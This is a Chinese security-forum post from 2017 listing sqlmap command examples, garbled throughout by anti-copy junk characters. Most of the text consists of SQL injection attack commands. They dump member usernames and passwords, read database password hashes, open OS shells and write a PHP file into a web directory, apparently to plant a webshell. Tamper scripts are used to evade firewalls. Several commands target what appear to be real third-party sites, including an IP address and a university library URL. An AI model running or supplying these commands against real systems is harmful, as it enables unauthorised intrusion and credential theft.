找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1884|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
* T! W  F8 B0 i2 @* w3 F9 t2 f/ Z$ }  u! U5 G
update :::::>     in the folder   after  execute    following   order : svn update
. R) P! E9 M% q7 [: M9 X  U
& _+ N/ |% K( g5 F. T! Ssqlmap.py -r 1.txt --current-db
# }* o  J. n0 |8 U% D+ D& b% G8 C' {; c; o' {# \
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
6 x+ G6 v7 z' y/ N% j0 G; r" n9 [9 Y, i9 r" Q' _  ]
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
3 A7 C! ^! o- Q3 T& i猜解数据库; n, a) Q, a9 T  U, b/ o, r
./sqlmap.py -u "injection-url" --dbs+ x) R+ y) {( {, s! @# c" S; k
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"( @/ l) R3 L' d% W8 q( }" [

2 H: E4 i* |; c猜解表名3 G) g$ `/ o4 ?1 F; m
./sqlmap.py -u "injection-url" -D database_name --tables
1 T: Q5 q# N" k5 g) z/ j( }5 U
' \, w+ ?' v* A* j' \sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
0 m+ b0 q5 M% j" m# \9 csqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
+ z1 h0 n6 q0 J2 p4 Z* E+ O: `; v# |' o2 e' u
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
9 J9 h7 J* ]  u, f/ j. n+ W; D& U4 Z+ L0 m
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py", w! Y, U& D% d, [2 T
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
( ^, |+ u8 h: J: r2 nsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
+ T5 x9 E5 ]- F) B, D( o4 @sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
* r8 ~( j1 `& D( H/ b5 l* U& j: w( {6 n2 O4 g
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
0 Z! O& d+ z0 Q, ~' r* L+ b, Osqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"- P& j: S) }. s
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
6 y8 i, B8 X7 A9 @! f  W" k# q' ]sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"  u$ r; J" r1 n
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
7 R. j" n8 ], b4 y. {$ B. y. p- ~0 Z( m* k) V# z
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了: |. F9 _# N# a
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"( Y' F7 x7 @9 q/ k: _/ N

; ~* b, E1 J9 U, Y3 Xsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
/ D) x% l( p$ D) Y# G2 W9 V猜解列名
! g( ~; A$ e8 F% X3 g9 u+ i./sqlmap.py -u "injection-url" -D database_name -T table_name --columns; d+ x9 e# H% |  _7 B  X
6 n+ }! X: ~3 f+ m
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" ' e6 y7 J; ~, r" j! ~- b. y% I
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" ' @3 W$ X8 Q6 e3 e
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"& y# m$ a4 o2 N# U

& v5 p+ h8 I( t( x& g4 zsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
' o+ ~. h: Z* f; y&submit=Go$ u9 s9 ]$ ]! J6 B) D
猜解值! b' O& H6 j. A( t. r6 c) R
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump' f9 k$ p: f1 [$ p) M8 o7 _9 [$ m  d
========================================================
( H  \" t( }6 w/ T. ~  Q; p: E搜索表名中包括mana字符的. Z$ _: \( }  A5 @, o0 L9 j% E1 r
/sqlmap.py -u "injection-url" -T mana --search
' J1 h$ A. y% K6 H0 y返回一个交互式sql shell7 a) O; u- o7 ~; _" A& L8 d
/sqlmap.py -u "injection-url" --sql-shell2 v+ d9 x" @0 G7 _& x& ?
读取指定文件(需权限)
' W1 h! I" L1 q# Z, ]2 P8 B% n. O/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"3 z9 B$ ]" b) _% ~% h  J& L
查看当前 用户 及 数据库
% K* `4 O) y1 y$ {9 J/sqlmap.py -u "injection-url" --current-user --current-db* d4 T# ^# M. }5 C! a# `: M; N! K7 |$ [$ j
本地文件 写入 远程目标绝对路径0 {0 {' [7 W9 J: B$ v
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
9 }% z3 I" V4 U( R1 i' m, Tsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" : `- O3 O. i3 w

9 t" F8 ~, q1 ]1 A4 u: bsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径8 q( e3 ^2 L/ q+ B5 R
查看某用的权限
! R$ @8 F8 g* o, ^/ ?$ W/sqlmap.py -u "injection-url" --privileges -U root) n" x- H4 Q1 U: Z8 I7 c
查看当前用户是否为dba: x9 b4 Q/ [0 K& @
/sqlmap.py -u "injection-url" --is-dba
0 ?, R: J/ E0 }5 v- Z, [读取所有数据库用户或指定数据库用户的密码
1 ^% L: ?! M: G# Z6 u. w' c* L) _2 Usqlmap.py -r 1.txt --users --passwords
: I! Q3 g* {, b- h( Y- ]" msqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
" g: d8 E! p) V/ n* J. ]4 m( D5 ?* `! _3 T+ I4 X
/sqlmap.py -u "injection-url" --passwords -U root5 r+ B) w/ ?2 o* m. B

; B8 Q, z. Y1 D; B--start&&--stop 与 --first&&--last 的区别
  \( |) }3 t' X1 q  X: N2 |4 n0 y) i/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)' V1 a  d% f: v5 Q! D( n( c

+ B% e+ s4 \" ~8 O0 y8 j从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)" [( O' c+ ]( @  R% C
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables: H+ m! s( X5 S% T/ P
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns0 p) S5 O; ]* W3 `' t0 Q

5 h% @) d$ L8 d+ w7 a$ T执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
5 C2 X! f. }" |5 a& ?/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"5 c8 N* q1 f* B+ L6 W5 {
: y: I; m' u; _5 T* K8 J& q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表